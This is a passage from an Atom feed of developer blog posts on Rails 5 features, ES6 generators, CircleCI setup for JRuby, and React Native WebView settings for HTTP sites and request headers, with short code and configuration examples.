      <content type="html"><![CDATA[<p>Rails 5 has<a href="https://github.com/rails/rails/pull/19434">deprecated usage of alias_method_chain</a>in favor of Ruby's built-in method <code>Module#prepend</code>.</p><h2>What is alias_method_chain and when to use it</h2><p>A lot of good articles have been written by some very smart people on the topicof &quot;alias_method_chain&quot;. So we will not be attempting to describe it here.</p><p><a href="https://ernie.io">Ernier Miller</a> wrote<a href="https://ernie.io/2011/02/03/when-to-use-alias_method_chain/">When to use alias_method_chain</a>more than five years ago but it is still worth a read.</p><h2>Using Module#prepend to solve the problem</h2><p>Ruby 2.0 introduced <code>Module#prepend</code> which allows us to insert a module beforethe class in the class ancestor hierarchy.</p><p>Let's try to solve the same problem using <code>Module#prepend</code>.</p><pre><code class="language-ruby">module Flanderizer  def hello    &quot;#{super}-diddly&quot;  endendclass Person  def hello    &quot;Hello&quot;  endend# In ruby 2.0Person.send(:prepend, Flanderizer)# In ruby 2.1Person.prepend(Flanderizer)flanders = Person.newputs flanders.hello #=&gt; &quot;Hello-diddly&quot;</code></pre><p>Now we are back to being nice to our neighbor which should make Ernie happy.</p><p>Let's see what the ancestors chain looks like.</p><pre><code class="language-ruby">flanders.class.ancestors # =&gt; [Flanderizer, Person, Object, Kernel]</code></pre><p>In Ruby 2.1 both <code>Module#include</code> and <code>Module#prepend</code> became a public method.In the above example we have shown both Ruby 2.0 and Ruby 2.1 versions.</p>]]></content>
    </entry><entry>
       <title><![CDATA[New framework defaults in Rails 5 to make upgrade easier]]></title>
       <author><name>Srihari K</name></author>
      <link href="https://www.bigbinary.com/blog/new-framework-defaults-in-rails-5-to-make-upgrade-easier"/>
      <updated>2016-08-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/new-framework-defaults-in-rails-5-to-make-upgrade-easier</id>
      <content type="html"><![CDATA[<p>When a new version of Rails comes out, one of the pain points is upgradingexisting apps to the latest version.</p><p>A Rails upgrade can be boiled down to following essential steps :</p><ol><li>Have a green build</li><li>Update the Rails version in Gemfile and bundle</li><li>Run the update task to update configuration files</li><li>Run tests and sanity checks to see if anything is broken by the upgrade andfix the issues</li><li>Repeat step 4!</li></ol><p>Rails 5 comes with a lot of new features. Some of them, like<a href="rails-5-does-not-halt-callback-chain-when-false-is-returned">not halting the callback chain when a callback returns false</a>,are breaking changes for older apps.</p><p>To keep the upgrade process easier, Rails 5 has added feature flags for all ofthese breaking changes.</p><p>When we create a brand new Rails 5 app, all of the feature flags will be turnedon. We can see these feature flags in<a href="https://github.com/rails/rails/pull/25231"><code>config/initializers/new_framework_defaults.rb</code> file</a>.</p><p>But when we upgrade an app to Rails 5, just updating the Gemfile and bundling isnot enough.</p><p>We need to run the <code>bin/rails app:update</code> task which will update fewconfigurations and also add <code>config/initializers/new_framework_defaults.rb</code>file.</p><p>Rails will turn off all the feature flags in the<code>config/initializers/new_framework_defaults.rb</code> file while upgrading an olderapp. In this way our app won't break due to the breaking features.</p><p>Lets take a look at these configuration flags one by one.</p><h4>Enable per-form CSRF tokens</h4><p>Starting from Rails 5,<a href="per-form-csrf-token-in-rails-5">each form will get its own CSRF token</a>. Thischange will have following feature flag.</p><pre><code class="language-ruby">Rails.application.config.action_controller.per_form_csrf_tokens</code></pre><p>For new apps, it will be set to <code>true</code> and for older apps upgraded to Rails 5,it will be set to <code>false</code>. Once we are ready to use this feature in our upgradedapp, we just need to change it to <code>true</code>.</p><h4>Enable HTTP Origin Header checking for CSRF mitigation</h4><p>For additional defense against CSRF attacks, Rails 5 has a feature to check HTTPOrigin header against the site's origin. This will be disabled by default inupgraded apps using the following configuration option:</p><pre><code class="language-ruby">Rails.application.config.action_controller.forgery_protection_origin_check</code></pre><p>We can set it to <code>true</code> to enable HTTP origin header check when we are ready touse this feature.</p><h4>Make Ruby 2.4 preserve the timezone of the receiver</h4><p>In Ruby 2.4 the <code>to_time</code> method for both<a href="https://bugs.ruby-lang.org/issues/12271"><code>DateTime</code> and <code>Time</code> will preserve the timezone of the receiver</a><a href="https://bugs.ruby-lang.org/issues/12189">when converting to an instance of <code>Time</code></a>.For upgraded apps, this feature is disabled by setting the followingconfiguration option to <code>false</code> :</p><pre><code class="language-ruby">ActiveSupport.to_time_preserves_timezone</code></pre><p>To use the Ruby 2.4+ default of <code>to_time</code>, set this to <code>true</code> .</p><h4>Require <code>belongs_to</code> associations by default</h4><p>In Rails 5, when we define a <code>belongs_to</code> association,<a href="rails-5-makes-belong-to-association-required-by-default">the association record is required to be present</a>.</p><p>In upgraded apps, this validation is not enabled. It is disabled using thefollowing option:</p><pre><code class="language-ruby">Rails.application.config.active_record.belongs_to_required_by_default</code></pre><p>We can update our code to use this feature and turn this on by changing theabove option to <code>true</code>.</p><h4>Do not halt callback chain when a callback returns false</h4><p>In Rails 5,<a href="rails-5-does-not-halt-callback-chain-when-false-is-returned">callback chain is not halted when a callback returns false</a>.This change is turned off for backward compatibility with the following optionset to <code>true</code>:</p><pre><code class="language-ruby">ActiveSupport.halt_callback_chains_on_return_false</code></pre><p>We can use the new behavior of not halting the callback chain after making surethat our code does not break due to this change and changing the value of thisconfig to <code>false</code>.</p><h4>Configure SSL options to enable HSTS with subdomains</h4><p>HTTP Strict Transport Security or HSTS, is a web security policy mechanism whichhelps to protect websites against protocol downgrade attacks and cookiehijacking. Using HSTS, we can ask browsers to make connections using only HTTPS.In upgraded apps, HSTS is not enabled on subdomains. In new apps HSTS is enabledusing the following option :</p><pre><code class="language-ruby">Rails.application.config.ssl_options = { hsts: { subdomains: true } }</code></pre><p>Having all these backward incompatible features which can be turned on one byone after the upgrade, in one file, eases the upgrade process. This initializeralso has helpful comments explaining the features!</p><p>Happy Upgrading!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Wildcard for specifying template dependencies]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-wildcard-for-specifying-template-dependencies"/>
      <updated>2016-08-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-wildcard-for-specifying-template-dependencies</id>
      <content type="html"><![CDATA[<h3>Cache Digests</h3><p>After cache digests were introduced in Rails, all calls to <code>#cache</code> in viewsautomatically append a digest of that template and all of its dependencies tothe cache key.</p><p>So developers no longer need to manually discard cache for the specifictemplates they make changes to.</p><pre><code class="language-ruby"># app/views/users/show.html.erb&lt;% cache user do %&gt;  &lt;h1&gt;All Posts&lt;/h1&gt;  &lt;%= render user.posts %&gt;&lt;% end %&gt;# app/views/posts/_post.html.erb&lt;% cache post do %&gt;  &lt;p&gt; &lt;%= post.content %&gt;&lt;/p&gt;  &lt;p&gt; &lt;%= post.created_at.to_s %&gt;  &lt;%= render 'posts/completed' %&gt;&lt;% end %&gt;</code></pre><p>This creates a caching key something like this<code>views/users/605416233-20129410191209/d9fb66b12bx8edf46707c67ab41d93cb2</code> whichdepends upon the template and its dependencies.</p><p>So, now if we change <code>posts/_completed.html.erb</code>, it will change cache key andthus it allows cache to expire automatically.</p><h3>Explicit dependencies</h3><p>As we saw in our earlier example, Rails was able to determine templatedependencies implicitly. But, sometimes it is not possible to determinedependencies at all.</p><p>Let's see an example below.</p><pre><code class="language-ruby"># app/views/users/show.html.erb&lt;% cache user do %&gt;  &lt;h1&gt;All Posts&lt;/h1&gt;  &lt;%= render user.posts %&gt;&lt;% end %&gt;# app/views/posts/_post.html.erb&lt;% cache post do %&gt;  &lt;p&gt; &lt;%= post.content %&gt;&lt;/p&gt;  &lt;p&gt; &lt;%= post.created_at.to_s %&gt;  &lt;%= render_post_complete_or_not(post) %&gt;&lt;% end %&gt;# app/helpers/posts_helper.rbmodule PostsHelper  def render_post_complete_or_not(post)    if post.completed?      render 'posts/complete'    else      render 'posts/incomplete'    end  endend</code></pre><p>To explicitly add dependency on this template, we need to add a<a href="http://api.rubyonrails.org/classes/ActionView/Helpers/CacheHelper.html#method-i-cache-label-Explicit+dependencies">comment in special format</a>as follows.</p><pre><code class="language-ruby">  &lt;%# Template Dependency: posts/complete %&gt;  &lt;%# Template Dependency: posts/incomplete %&gt;</code></pre><p>If we have multiple dependencies, we need to add special comments for all thedependencies one by one.</p><pre><code class="language-ruby"># app/views/posts/_post.html.erb&lt;% cache post do %&gt;  &lt;p&gt; &lt;%= post.content %&gt;&lt;/p&gt;  &lt;p&gt; &lt;%= post.created_at.to_s %&gt;  &lt;%# Template Dependency: posts/complete %&gt;  &lt;%# Template Dependency: posts/incomplete %&gt;  &lt;%= render_post_complete_or_not(post) %&gt;&lt;% end %&gt;</code></pre><h3>Using Wildcard in Rails 5</h3><p>In Rails 5, we can now use a<a href="https://github.com/rails/rails/pull/20904">wildcard for adding dependencies</a> onmultiple files in a directory. So, instead of adding files one by one we can adddependency using wildcard.</p><pre><code class="language-ruby"># app/views/posts/_post.html.erb&lt;% cache post do %&gt;  &lt;p&gt; &lt;%= post.content %&gt;&lt;/p&gt;  &lt;p&gt; &lt;%= post.created_at.to_s %&gt;  &lt;%# Template Dependency: posts/* %&gt;  &lt;%= render_post_complete_or_not(post) %&gt;&lt;% end %&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Passing records to fresh_when and stale?]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-supports-passing-collection-of-records-to-fresh_when-and-stale"/>
      <updated>2016-08-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-supports-passing-collection-of-records-to-fresh_when-and-stale</id>
      <content type="html"><![CDATA[<p>Rails has powerful tools to control<a href="http://api.rubyonrails.org/classes/ActionController/ConditionalGet.html">caching of resources via HTTP</a>such as <code>fresh_when</code> and <code>stale?</code>.</p><p>Previously we could only pass a single record to these methods but now Rails 5adds support for accepting a collection of records as well. For example,</p><pre><code class="language-ruby">def index  @posts = Post.all  fresh_when(etag: @posts, last_modified: @posts.maximum(:updated_at))end</code></pre><p>or simply written as,</p><pre><code class="language-ruby">def index  @posts = Post.all  fresh_when(@posts)end</code></pre><p>This works with <code>stale?</code> method too, we can pass a collection of records to it.For example,</p><pre><code class="language-ruby">def index  @posts = Post.all  if stale?(@posts)    render json: @posts  endend</code></pre><p>To see this in action, let's begin by making a request at <code>/posts</code>.</p><pre><code class="language-bash">$ curl -I http://localhost:3000/postsHTTP/1.1 200 OKX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffETag: W/&quot;a2b68b7a7f8c67f1b88848651a86f5f5&quot;Content-Type: text/html; charset=utf-8Cache-Control: max-age=0, private, must-revalidateX-Request-Id: 7c8457e7-9d26-4646-afdf-5eb44711fa7bX-Runtime: 0.074238</code></pre><p>In the second request, we would send the ETag in <code>If-None-Match</code> header to checkif the data has changed.</p><pre><code class="language-bash">$ curl -I -H 'If-None-Match: W/&quot;a2b68b7a7f8c67f1b88848651a86f5f5&quot;' http://localhost:3000/postsHTTP/1.1 304 Not ModifiedX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffETag: W/&quot;a2b68b7a7f8c67f1b88848651a86f5f5&quot;Cache-Control: max-age=0, private, must-revalidateX-Request-Id: 6367b2a5-ecc9-4671-8a79-34222dc50e7fX-Runtime: 0.003756</code></pre><p>Since there's no change, the server returned <code>HTTP/1.1 304 Not Modified</code>. Ifthese requests were made from a browser, it would automatically use the versionin its cache on the second request.</p><p>The second request was obviously faster as the server was able to save the timeof fetching data and rendering it. This can be seen in Rails log,</p><pre><code class="language-plaintext">Started GET &quot;/posts&quot; for ::1 at 2016-08-06 00:39:44 +0530Processing by PostsController#index as HTML   (0.2ms)  SELECT MAX(&quot;posts&quot;.&quot;updated_at&quot;) FROM &quot;posts&quot;   (0.1ms)  SELECT COUNT(*) AS &quot;size&quot;, MAX(&quot;posts&quot;.&quot;updated_at&quot;) AS timestamp FROM &quot;posts&quot;  Rendering posts/index.html.erb within layouts/application  Post Load (0.2ms)  SELECT &quot;posts&quot;.* FROM &quot;posts&quot;  Rendered posts/index.html.erb within layouts/application (2.0ms)Completed 200 OK in 31ms (Views: 27.1ms | ActiveRecord: 0.5ms)Started GET &quot;/posts&quot; for ::1 at 2016-08-06 00:39:46 +0530Processing by PostsController#index as HTML   (0.2ms)  SELECT MAX(&quot;posts&quot;.&quot;updated_at&quot;) FROM &quot;posts&quot;   (0.1ms)  SELECT COUNT(*) AS &quot;size&quot;, MAX(&quot;posts&quot;.&quot;updated_at&quot;) AS timestamp FROM &quot;posts&quot;Completed 304 Not Modified in 2ms (ActiveRecord: 0.3ms)</code></pre><p>Cache expires when collection of records is updated. For example, an addition ofa new record to the collection or a change in any of the records (which changes<code>updated_at</code>) would change the <code>ETag</code>.</p><p>Now that Rails 5 supports collection of records in <code>fresh_when</code> and <code>stale?</code>, wehave an improved system to cache resources and make our applications faster.This is more helpful when we have controller actions with time consuming dataprocessing logic.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Set model name in fixtures as metadata]]></title>
       <author><name>Srihari K</name></author>
      <link href="https://www.bigbinary.com/blog/set-model-name-in-fixtures-as-metadata"/>
      <updated>2016-08-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/set-model-name-in-fixtures-as-metadata</id>
      <content type="html"><![CDATA[<h2>Fixtures</h2><p>In Rails, for setting up test data we use fixtures. Fixtures are written as YAMLfiles placed in <code>test/fixtures</code> directory in the Rails app.</p><p>The model name of a fixture is automatically picked up from the fixture filename.</p><p>Generally in Rails, the model name and table name follow a strict convention.The table for <code>User</code> model will be <code>users</code>. By this convention, the fixture filefor <code>User</code> model is <code>test/fixtures/users.yml</code>.</p><p>But sometimes model names do not match directly with the table name. When we arebuilding on top of a legacy application or we have namespacing of models, wemight run into this scenario. In such cases detection of model name from fixturefile name becomes difficult.</p><p>When automatic detection of model name from fixture file name fails, we canspecify the table name using the<a href="http://api.rubyonrails.org/classes/ActiveRecord/TestFixtures/ClassMethods.html#method-i-set_fixture_class">set_fixture_class</a>method. Take a look at our older<a href="tricks-and-tips-for-using-fixtures-in-rails">blog</a> for an example of how to dothis.</p><p>One drawback of using this approach is that, the model name set using<code>set_fixture_class</code> is available only in the context of tests. When we run<code>rake db:fixtures:load</code> to load the fixtures, the tests are not run, and thefixture file is not associated with the model name we set using<code>set_fixture_class</code>. This will cause failure to load the fixtures correctly.</p><h2>The Rails 5 way</h2><p>In Rails 5 a new key is <a href="https://github.com/rails/rails/pull/20574">added</a> tospecify the model name for a fixture file.</p><p>Let us consider the example where our table was named <code>morning_appts</code>, and weused a more appropriately named model <code>MorningAppointment</code> to represent thistable.</p><p>We can now set the table name in our fixture file<code>test/fixtures/morning_appts.yml</code> as follows :</p><pre><code class="language-yaml">_fixture:  model_class: MorningAppointmentstandup:  name: Standup  priority: 1</code></pre><p>The special key <code>_fixture</code> in the fixture file is now used to store metadataabout the fixture. <code>model_class</code> is the key we can use to specify the model namefor the fixture.</p><p>We can now use this fixture to load test data using the rake task<code>rake db:fixtures:load</code> as well.</p><p>Happy Testing!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Introduction to ES6 generators]]></title>
       <author><name>Arbaaz</name></author>
      <link href="https://www.bigbinary.com/blog/introduction-to-es6-generators"/>
      <updated>2016-08-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/introduction-to-es6-generators</id>
      <content type="html"><![CDATA[<p><strong>Generators</strong> in JavaScript are the functions that can be <strong>paused</strong> and<strong>resumed</strong>.</p><pre><code class="language-javascript">function* genFunc(){...}</code></pre><p>Calling <code>genFunc()</code> <em>doesn't execute the body</em> of the function.</p><pre><code class="language-javascript">const genObj = genFunc();</code></pre><p>Instead, it returns <strong>generator object</strong> which can be used to control theexecution of the generator.</p><p><code>genObj.next()</code> will start executing the function and it will execute <strong>till</strong>it reaches <code>yield</code> keyword.</p><p>We can think of <code>yield</code> as <code>return for now</code>. It is similar to C#<a href="https://msdn.microsoft.com/en-us/library/9k7k7cf0.aspx">yield</a>.</p><pre><code class="language-javascript">function* genFunc() {  console.log(&quot;First&quot;);  yield;  console.log(&quot;Second&quot;);}const genObj = genFunc();genObj.next();/*outputFirst*/</code></pre><p>Calling <code>genObj.next()</code> again will <strong>resume</strong> the further execution after yield.</p><pre><code class="language-javascript">function* genFunc() {  console.log(&quot;First&quot;);  yield;  console.log(&quot;Second&quot;);}const genObj = genFunc();genObj.next();genObj.next();/*outputFirstSecond*/</code></pre><p>Here's how the execution looks like:</p><p><img src="/blog_images/2016/introduction-to-es6-generators/generator.gif" alt="Generator"></p><p><code>yield</code> is not allowed inside non-generator functions. That is, yielding incallbacks doesn't work.</p><p>We can also pass the data to generator function via <code>next</code>.</p><pre><code class="language-javascript">function* genFunc() {  console.log(&quot;First&quot;);  const input = yield;  console.log(input);  console.log(&quot;Second&quot;);}const genObj = genFunc();genObj.next();genObj.next(&quot;Third&quot;);/*outputFirstThirdSecond*/</code></pre><p>We can retrieve the yielded values via the generator object <code>genObj</code>:</p><pre><code class="language-javascript">function* genFunc() {  console.log(&quot;First&quot;);  const input = yield;  console.log(input);  console.log(&quot;Second&quot;);  yield &quot;Forth&quot;;}const genObj = genFunc();genObj.next();const result = genObj.next(&quot;Third&quot;);console.log(result);/*outputFirstThirdSecond{  done: false,  value: &quot;Forth&quot;}*/</code></pre><p>We can have multiple <code>yield</code> in the function as shown in the above example.</p><p>Once, the execution of the generator function is completed, further calls to<code>genObj.next()</code> will have <strong>no effect</strong>.</p><h3>Further reading</h3><p>We highly recommend<a href="http://exploringjs.com/es6/ch_generators.html">Exploring ES6</a> by Dr. AxelRauschmayer to go deeper on this topic.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring CircleCI for JRuby]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-configure-circle-ci-for-jruby"/>
      <updated>2016-08-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-configure-circle-ci-for-jruby</id>
      <content type="html"><![CDATA[<p>Recently we worked with a client where we had to run a part of their multi-threaded code in JRuby for performance reasons. They have been using <a href="https://circleci.com">CircleCI</a> with MRI for running tests. In this post I will explain how we configured CircleCI to run the same tests using both JRuby and MRI.</p><p>CircleCI uses <code>circle.yml</code> file for configuration. Before configuring JRuby, this is how it looked like:</p><pre><code class="language-yaml">machine:  ruby:    version: 2.1.5dependencies:  pre:    - ./bundle_install_circle_ci.sh  cache_directories:    - &quot;~/vendor/bundle&quot;test:  override:    - ? bundle exec rspec --format progress --format documentation --format RspecJunitFormatter --out $CIRCLE_TEST_REPORTS/app.xml      : parallel: true        pwd: app        files:          - spec/**/*_spec.rb</code></pre><p>&lt;br/&gt;Here are the steps to enable JRuby in CircleCI.</p><p><strong>Specify the JDK version</strong></p><p>We need to specify a JDK version before using JRuby.</p><pre><code class="language-yaml">machine:  java:    version: openjdk7</code></pre><p><strong>Install proper dependencies</strong></p><p>We needed to use JRuby 9.0.4.0 but the version of JRuby that came with Ubuntu 12.04 image of CircleCI was different. We added <code>rvm install</code> command as follows to install specific version that we wanted. Also we can configure any script (like <code>bundle install</code>) that needs to run before running tests.</p><pre><code class="language-yaml">dependencies:  pre:    - rvm install jruby-9.0.4.0    - ./bundle_install_jruby_circle_ci.sh  cache_directories:    - &quot;~/vendor/bundle&quot;</code></pre><p><strong>Configure JRuby</strong></p><p>We used <code>rvm-exec</code> to set JRuby for running tests for this particular component in the <code>test</code> section. Otherwise by default it picks up MRI.</p><pre><code class="language-yaml">test:  override:    - ? rvm-exec jruby-9.0.4.0 bash -c &quot;bundle exec rspec --format progress --format documentation --format RspecJunitFormatter --out $CIRCLE_TEST_REPORTS/app_jruby.xml&quot;      : parallel: true        pwd: app        files:          - spec/**/*_spec.rb</code></pre><p><strong>Improving test runs on JRuby</strong></p><p>Once we started running tests with JRuby, we observed it was taking comparatively slower to finish all tests. Most of the time was spent in starting the JVM. We made it faster by setting <a href="https://github.com/jruby/jruby/wiki/Improving-startup-time#use-the---dev-flag"><code>--dev</code> parameter</a> in <code>JRUBY_OPTS</code> environment variable. This parameter improves JRuby boot time and it shaved more than a minute time for us.</p><pre><code class="language-yaml">machine:  environment:    JRUBY_OPTS: &quot;--dev&quot;</code></pre><p><strong>Here is the final circle.yml file:</strong></p><pre><code class="language-yaml"># circle.ymlmachine:  ruby:    version: 2.1.5  java:    version: openjdk7  environment:    JRUBY_OPTS: &quot;--dev&quot;dependencies:  pre:    - rvm install jruby-9.0.4.0    - ./bundle_install_jruby_circle_ci.sh  cache_directories:    - &quot;~/vendor/bundle&quot;test:  override:    - ? rvm-exec jruby-9.0.4.0 bash -c &quot;bundle exec rspec --format progress --format documentation --format RspecJunitFormatter --out $CIRCLE_TEST_REPORTS/app_jruby.xml&quot;      : parallel: true        pwd: app        files:          - spec/**/*_spec.rb    - ? bundle exec rspec --format progress --format documentation --format RspecJunitFormatter --out $CIRCLE_TEST_REPORTS/app_mri.xml      : parallel: true        pwd: app        files:          - spec/**/*_spec.rb</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Opening non HTTPS sites in WebView in React Native]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/open-non-https-sites-in-webview-in-react-native"/>
      <updated>2016-07-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/open-non-https-sites-in-webview-in-react-native</id>
      <content type="html"><![CDATA[<p>Using WebView in a React Native application allows us to reuse already built webpages.</p><p>With iOS 9 or higher if our application attempts to connect to any HTTP serverthat doesn't support the latest SSL technology<a href="http://en.wikipedia.org/wiki/Transport_Layer_Security#TLS_1.2">(TLSv1.2)</a>,WebView will fail and will not be able load the web pages.</p><p>Let's see this in action. Here we are trying to access a HTTP site via WebViewin React Native.</p><pre><code class="language-javascript">&lt;WebView style={styles.container} source={{ uri: &quot;http://del.icio.us&quot; }} /&gt;</code></pre><p>Running that on an iPhone simulator with iOS version 9.0 or greater would showfollowing error.</p><pre><code class="language-plaintext">Error Loading PageDomain: NSURLErrorDomainError Code: -1022Description: The resource could not be loaded becausethe App Transport Security policy requires the use of asecure connection</code></pre><p>Ideally, the site we are trying to connect to should have HTTPS enabled. Howeverthere might be cases where we need to connect to sites where HTTPS is notenabled.</p><p>For example, while developing the app, we might want to connect to local serverwhich is running just HTTP.</p><h2>Fix - Using Xcode</h2><p>To access HTTP sites inside our WebView, we need to open the project in Xcodeand open the <code>Info.plist</code> file.</p><p>In the list of keys, we will find <code>App Transport Security Settings</code>.</p><p>When we expand the section, we would find <code>localhost</code> inside the<code>Exception Domains</code> and the key <code>NSTemporaryExceptionAllowsInsecureHTTPLoads</code>with value <code>true</code>.</p><p>Because of this setting when we are connecting to localhost then app runs evenif server is running on HTTP and not on HTTPS.</p><p><img src="/blog_images/2016/open-non-https-sites-in-webview-in-react-native/info-plist-before.png" alt="info plist before"></p><p>So in order to make our non HTTPS site run, we need to add our website url tothis whitelisting.</p><p>When we hover over the <code>Exception Domains</code> key, we would see a <code>+</code> sign at theright hand side.</p><p>Click on it and add our domain here. Set the type to <code>dictionary</code>.</p><p>Now click on the domain we just entered and add<code>NSTemporaryExceptionAllowsInsecureHTTPLoads</code> with type <code>Boolean</code> and value<code>YES</code> similar to the one present for <code>localhost</code></p><p><img src="/blog_images/2016/open-non-https-sites-in-webview-in-react-native/info-plist-after.png" alt="info plist after"></p><p>Re-run the app using <code>react-native run-ios</code> from the terminal and now the sitewould be loaded.</p><p>If it doesn't work, then prior to running the app, do a clean build from xcode.</p><h2>Fix using any IDE</h2><p>By making the changes from XCode, if we look at the changes in info.plist file,we would find a few lines of code added.</p><p>So if we don't want to open Xcode for the fix, we can add the following linesdirectly in our info.plist.</p><p>Edit the node for the key <code>NSAppTransportSecurity</code> so that the whole node nowlooks like this:</p><pre><code class="language-plist">&lt;key&gt;NSAppTransportSecurity&lt;/key&gt;&lt;dict&gt;    &lt;key&gt;NSExceptionDomains&lt;/key&gt;    &lt;dict&gt;        &lt;key&gt;del.icio.us&lt;/key&gt;        &lt;dict&gt;            &lt;key&gt;NSTemporaryExceptionAllowsInsecureHTTPLoads&lt;/key&gt;            &lt;true/&gt;        &lt;/dict&gt;        &lt;key&gt;localhost&lt;/key&gt;        &lt;dict&gt;            &lt;key&gt;NSTemporaryExceptionAllowsInsecureHTTPLoads&lt;/key&gt;            &lt;true/&gt;        &lt;/dict&gt;    &lt;/dict&gt;&lt;/dict&gt;</code></pre><p>Be sure to re-run the app using <code>react-native run-ios</code>. Now let's see how toallow all the HTTP sites instead of whitelisting each and everyone</p><h4>Using Xcode</h4><p>Using Xcode : To allow all the non HTTPS sites, just delete the<code>Exception Domains</code> from Xcode inside info.plist and add a new key<code>Allow Arbitrary Loads</code> with the value <code>true</code>.</p><h4>Using any IDE</h4><p>Our <code>NSAppTransportSecurity</code> should just contain the following.</p><pre><code class="language-plist">&lt;key&gt;NSAppTransportSecurity&lt;/key&gt;&lt;dict&gt;    &lt;key&gt;NSAllowsArbitraryLoads&lt;/key&gt;    &lt;true/&gt;&lt;/dict&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[HTTP request headers on each WebView request]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/passing-request-headers-on-each-webview-request-in-react-native"/>
      <updated>2016-07-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/passing-request-headers-on-each-webview-request-in-react-native</id>
      <content type="html"><![CDATA[<p>Using<a href="https://facebook.github.io/react-native/docs/webview.html">WebView</a>in a React Native application allowsus to reuse already built web pages.</p><p>HTTP Headers are name/value pairs thatappear in both request andresponse messages.The purpose of headers is to supplythe web server with additional informationand control how content is returned.</p><p>In React Native, while openingweb pages via WebView Component,we can pass headers to the HTTP request.Refer to our<a href="passing-user-agent-or-custom-header-in-react-native-webview">previous blog</a>for more on this.</p><pre><code class="language-javascript">&lt;WebView  source={{    uri: &quot;http://localhost:3000&quot;,    headers: { &quot;custom-app-header&quot;: &quot;react-native-ios-app&quot; },  }}/&gt;</code></pre><p>But there is a bug.On subsequent requests frominside the WebView,the headers are not passed in the request.</p><p>First, let's try to understandby recreating the bug.We have created a simple node serverwhich will act as the backendfor the application and log the requestalong with the custom header.</p><p>Here is our <code>server.js</code></p><pre><code class="language-javascript">var http = require(&quot;http&quot;);var port = 9000;function logRequest(request) {  console.log(&quot;Processing request for: &quot;, request.url);  console.log(&quot;Custom Header: &quot;, request.headers[&quot;custom-app-header&quot;]);  console.log(&quot;Request Processed\n&quot;);}http  .createServer(function (request, response) {    response.writeHead(200, { &quot;Content-Type&quot;: &quot;text/html&quot; });    switch (request.url) {      case &quot;/&quot;:        response.write(          &quot;&lt;html&gt;&lt;body&gt;Welcome&lt;a href='/bye'&gt;Bye&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;&quot;        );        logRequest(request);        break;      case &quot;/bye&quot;:        response.write(&quot;&lt;html&gt;&lt;body&gt;Bye&lt;a href='/'&gt;Welcome&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;&quot;);        logRequest(request);        break;      default:        break;    }    response.end();  })  .listen(port);</code></pre><p>As we can see, the <code>welcome</code> pagehas a link to <code>bye</code> and vice versa.Let's start the node server by running<code>node server.js</code>.</p><p>When we run the app on the simulator,the <code>welcome</code> page opens up,and in the server log,we can verify that the requestheader is being passed.</p><pre><code class="language-plaintext">Processing request for:  /Custom Header:  react-native-ios-appRequest Processed</code></pre><p>But when we click on the <code>Bye</code>link from the <code>Welcome</code> page,the server doesn't receive therequest header,which can be verified from the log.</p><pre><code class="language-plaintext">Processing request for:  /byeCustom Header:  undefinedRequest Processed</code></pre><p>And it can be verified againthat for any subsequent clicksthe request header doesnot get passed. We can click on<code>Welcome</code> and check the log again.</p><pre><code class="language-plaintext">Processing request for:  /Custom Header:  undefinedRequest Processed</code></pre><p>We recently encountered thisbug and created an issue<a href="https://github.com/facebook/react-native/issues/8693">here</a>.Until the issue is fixed,we have found a workaround.</p><h2>Workaround</h2><p>WebView provides a prop <code>onLoadStart</code>which accepts a function that isinvoked when the WebViewstarts loading.</p><p>We can use this prop to knowwhen a link is clickedand then re-render the WebViewcomponent with the new url.Re-rendering the WebView componentwill load the page as if it's thefirst page and then the requestheaders would be passed.</p><p>We know that in React,a component re-renders itself whenany of its state changes.The only thing which changeshere is the url, so let's move theurl to a state andinitialize it to the <code>Welcome</code> pagewhich is the root of the application.And then use the <code>onLoadStart</code> propto change the url state to the clicked url.</p><p>Here's the new code.</p><pre><code class="language-javascript">class testApp extends Component {  state = {    url: &quot;http://localhost:3000&quot;,  };  render() {    return (      &lt;WebView        onLoadStart={(navState) =&gt;          this.setState({ url: navState.nativeEvent.url })        }        source={{          uri: this.state.url,          headers: { &quot;custom-app-header&quot;: &quot;react-native-ios-app&quot; },        }}      /&gt;    );  }}</code></pre><p>Now when we run the app,we can verify in the backend thatthe request headers are being senteven when we click on <code>Bye</code> link.</p><pre><code class="language-plaintext">Processing request for:  /byeCustom Header:  undefinedRequest ProcessedProcessing request for:  /byeCustom Header:  react-native-ios-appRequest Processed</code></pre><p>One thing to note here is that,when we click on the <code>Bye</code> link,the request is not interceptedfrom reaching the server.We are just resending therequest by means of a componentre-render with the new url.</p><p>Hence in the log, we see two requests.First request took place whenuser clicked on the link,and the second request occurredwhen the component got re-renderedwith the required request headers.</p><p>This workaround might help usto pass the request headers whichwe intend to send to the backendserver until the issue gets fixed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[ActionController::Parameters in Rails 5]]></title>
       <author><name>Rohit Arolkar</name></author>
      <link href="https://www.bigbinary.com/blog/parameters-no-longer-inherit-from-hash-with-indifferent-access-in-rails-5"/>
